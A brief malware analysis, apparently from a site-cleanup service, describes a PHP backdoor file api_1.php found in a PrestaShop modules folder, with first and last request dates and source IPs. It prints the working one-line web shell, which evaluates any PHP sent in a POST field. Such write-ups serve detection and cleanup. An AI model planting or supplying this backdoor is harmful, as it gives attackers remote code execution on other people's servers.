api_1.php is a classic backdoor file designed to execute PHP code sent via POST requests. If you’ve found this file on your server, it most likely means the entire hosting account has been compromised and should be thoroughly checked.
Malicious code:
<?php if(isset($_POST[z])){eval($_POST[z]);exit();}
We found this file inside the /modules/ folder of a PrestaShop installation, but it can be used on any platform to regain access. The first occurrence on the server where we performed the cleanup was dated 2025-08-14, with a request originating from 191.102.187.197. The last request was made from 209.99.189.115 on 2026-05-01.
File classification:
PHP/Webshell.NWE trojan